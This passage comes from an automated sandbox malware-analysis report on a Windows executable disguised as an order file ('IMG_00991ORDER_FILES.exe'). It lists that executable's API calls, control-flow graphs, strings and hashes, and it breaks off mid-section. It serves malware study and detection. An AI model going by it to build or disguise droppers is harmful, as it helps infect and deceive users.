                                                                                    • DeleteFileW.KERNEL32(936), ref: 004039ED
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,936,?), ref: 00403A1B
                                                                                      • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,936,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                                                                      • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                                                      • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                                                                      • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                                                      • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                                                                    • OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403A7F
                                                                                    • ExitProcess.KERNEL32 ref: 00403A9C
                                                                                    • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,936,00000000), ref: 00403AA3
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403ABF
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403AC6
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AFE
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                                                                    • ExitProcess.KERNEL32 ref: 00403B46
                                                                                      • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"$1033$936$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\vride$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                    • API String ID: 1813718867-3273578562
                                                                                    • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                                                    • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                                                                    • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                                                                    • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E
                                                                                    APIs
                                                                                      • Part of subcall function 6F8A12BB: GlobalAlloc.KERNEL32(00000040,?,6F8A12DB,?,6F8A137F,00000019,6F8A11CA,-000000A0), ref: 6F8A12C5
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F8A1D2D
                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6F8A1D75
                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6F8A1D7F
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A1D92
                                                                                    • GlobalFree.KERNEL32(?), ref: 6F8A1E74
                                                                                    • GlobalFree.KERNEL32(?), ref: 6F8A1E79
                                                                                    • GlobalFree.KERNEL32(?), ref: 6F8A1E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F8A2068
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6F8A2222
                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6F8A22A1
                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6F8A22B2
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6F8A230C
                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6F8A2326
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 245916457-0
                                                                                    • Opcode ID: f11fc5776c1de349788542fb25ec389b0eb3b2680702a6858fa8e9ba0ebddc7d
                                                                                    • Instruction ID: afdf15e12b90e7c852e6afeb6de67c193c3db2315c3c3286d7c110140ecad5ec
                                                                                    • Opcode Fuzzy Hash: f11fc5776c1de349788542fb25ec389b0eb3b2680702a6858fa8e9ba0ebddc7d
                                                                                    • Instruction Fuzzy Hash: 72229D71D04A09DADB28CFB9C5806EDB7B0FF05315F104AAAD1A5EE190D77AA681CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 620 405c60-405c86 call 405f2b 623 405c88-405c9a DeleteFileW 620->623 624 405c9f-405ca6 620->624 625 405e1c-405e20 623->625 626 405ca8-405caa 624->626 627 405cb9-405cc9 call 406554 624->627 629 405cb0-405cb3 626->629 630 405dca-405dcf 626->630 633 405cd8-405cd9 call 405e6f 627->633 634 405ccb-405cd6 lstrcatW 627->634 629->627 629->630 630->625 632 405dd1-405dd4 630->632 635 405dd6-405ddc 632->635 636 405dde-405de6 call 4068b1 632->636 637 405cde-405ce2 633->637 634->637 635->625 636->625 644 405de8-405dfc call 405e23 call 405c18 636->644 640 405ce4-405cec 637->640 641 405cee-405cf4 lstrcatW 637->641 640->641 643 405cf9-405d15 lstrlenW FindFirstFileW 640->643 641->643 645 405d1b-405d23 643->645 646 405dbf-405dc3 643->646 660 405e14-405e17 call 4055d9 644->660 661 405dfe-405e01 644->661 649 405d43-405d57 call 406554 645->649 650 405d25-405d2d 645->650 646->630 648 405dc5 646->648 648->630 662 405d59-405d61 649->662 663 405d6e-405d79 call 405c18 649->663 652 405da2-405db2 FindNextFileW 650->652 653 405d2f-405d37 650->653 652->645 657 405db8-405db9 FindClose 652->657 653->649 658 405d39-405d41 653->658 657->646 658->649 658->652 660->625 661->635 664 405e03-405e12 call 4055d9 call 406314 661->664 662->652 665 405d63-405d6c call 405c60 662->665 673 405d9a-405d9d call 4055d9 663->673 674 405d7b-405d7e 663->674 664->625 665->652 673->652 677 405d80-405d90 call 4055d9 call 406314 674->677 678 405d92-405d98 674->678 677->652 678->652
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405C89
                                                                                    • lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405CD1
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405CF4
                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405CFA
                                                                                    • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00405D0A
                                                                                    • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405DAA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                                                                    • API String ID: 2035342205-1793807644
                                                                                    • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                                                    • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                                                                    • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                                                    • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 00406048
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76BF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                                                    • FindClose.KERNEL32(00000000), ref: 004068C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                                                    • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                                                                    • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                                                    • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 151 403fd4-403fe6 152 403fec-403ff2 151->152 153 40414d-40415c 151->153 152->153 154 403ff8-404001 152->154 155 4041ab-4041c0 153->155 156 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 153->156 159 404003-404010 SetWindowPos 154->159 160 404016-40401d 154->160 157 404200-404205 call 40451f 155->157 158 4041c2-4041c5 155->158 156->155 170 40420a-404225 157->170 162 4041c7-4041d2 call 401389 158->162 163 4041f8-4041fa 158->163 159->160 165 404061-404067 160->165 166 40401f-404039 ShowWindow 160->166 162->163 187 4041d4-4041f3 SendMessageW 162->187 163->157 169 4044a0 163->169 173 404080-404083 165->173 174 404069-40407b DestroyWindow 165->174 171 40413a-404148 call 40453a 166->171 172 40403f-404052 GetWindowLongW 166->172 183 4044a2-4044a9 169->183 180 404227-404229 call 40140b 170->180 181 40422e-404234 170->181 171->183 172->171 182 404058-40405b ShowWindow 172->182 176 404085-404091 SetWindowLongW 173->176 177 404096-40409c 173->177 184 40447d-404483 174->184 176->183 177->171 186 4040a2-4040b1 GetDlgItem 177->186 180->181 191 40423a-404245 181->191 192 40445e-404477 DestroyWindow EndDialog 181->192 182->165 184->169 190 404485-40448b 184->190 193 4040d0-4040d3 186->193 194 4040b3-4040ca SendMessageW IsWindowEnabled 186->194 187->183 190->169 195 40448d-404496 ShowWindow 190->195 191->192 196 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 191->196 192->184 197 4040d5-4040d6 193->197 198 4040d8-4040db 193->198 194->169 194->193 195->169 223 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 196->223 224 40429a-40429f 196->224 201 404106-40410b call 4044ac 197->201 202 4040e9-4040ee 198->202 203 4040dd-4040e3 198->203 201->171 206 404124-404134 SendMessageW 202->206 208 4040f0-4040f6 202->208 203->206 207 4040e5-4040e7 203->207 206->171 207->201 211 4040f8-4040fe call 40140b 208->211 212 40410d-404116 call 40140b 208->212 221 404104 211->221 212->171 220 404118-404122 212->220 220->221 221->201 227 4042e0-4042e1 223->227 228 4042e3 223->228 224->223 229 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 227->229 228->229 230 404315-404326 SendMessageW 229->230 231 404328 229->231 232 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 230->232 231->232 232->170 243 404373-404375 232->243 243->170 244 40437b-40437f 243->244 245 404381-404387 244->245 246 40439e-4043b2 DestroyWindow 244->246 245->169 248 40438d-404393 245->248 246->184 247 4043b8-4043e5 CreateDialogParamW 246->247 247->184 249 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 247->249 248->170 250 404399 248->250 249->169 255 404444-404457 ShowWindow call 40451f 249->255 250->169 257 40445c 255->257 257->184
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                                                                    • ShowWindow.USER32(?), ref: 00404030
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405B
                                                                                    • DestroyWindow.USER32 ref: 0040406F
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                                                                    • GetDlgItem.USER32(?,?), ref: 004040A7
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                                                                    • GetDlgItem.USER32(?,?), ref: 0040416D
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404177
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041E2
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404288
                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042A9
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                                                                    • EnableWindow.USER32(?,?), ref: 004042D6
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042EC
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F3
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040430B
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                                                                    • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                                                                    • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404490
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 121052019-0
                                                                                    • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                                                    • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                                                                    • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                                                                    • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 258 403c26-403c3e call 406948 261 403c40-403c50 call 40649b 258->261 262 403c52-403c89 call 406422 258->262 270 403cac-403cd5 call 403efc call 405f2b 261->270 266 403ca1-403ca7 lstrcatW 262->266 267 403c8b-403c9c call 406422 262->267 266->270 267->266 276 403d67-403d6f call 405f2b 270->276 277 403cdb-403ce0 270->277 283 403d71-403d78 call 406591 276->283 284 403d7d-403da2 LoadImageW 276->284 277->276 278 403ce6-403d0e call 406422 277->278 278->276 287 403d10-403d14 278->287 283->284 285 403e23-403e2b call 40140b 284->285 286 403da4-403dd4 RegisterClassW 284->286 301 403e35-403e40 call 403efc 285->301 302 403e2d-403e30 285->302 289 403ef2 286->289 290 403dda-403e1e SystemParametersInfoW CreateWindowExW 286->290 292 403d26-403d32 lstrlenW 287->292 293 403d16-403d23 call 405e50 287->293 294 403ef4-403efb 289->294 290->285 295 403d34-403d42 lstrcmpiW 292->295 296 403d5a-403d62 call 405e23 call 406554 292->296 293->292 295->296 300 403d44-403d4e GetFileAttributesW 295->300 296->276 304 403d50-403d52 300->304 305 403d54-403d55 call 405e6f 300->305 311 403e46-403e60 ShowWindow call 4068d8 301->311 312 403ec9-403ed1 call 4056ac 301->312 302->294 304->296 304->305 305->296 319 403e62-403e67 call 4068d8 311->319 320 403e6c-403e7e GetClassInfoW 311->320 317 403ed3-403ed9 312->317 318 403eeb-403eed call 40140b 312->318 317->302 323 403edf-403ee6 call 40140b 317->323 318->289 319->320 321 403e80-403e90 GetClassInfoW RegisterClassW 320->321 322 403e96-403eb9 DialogBoxParamW call 40140b 320->322 321->322 328 403ebe-403ec7 call 403b76 322->328 323->302 328->294
                                                                                    APIs
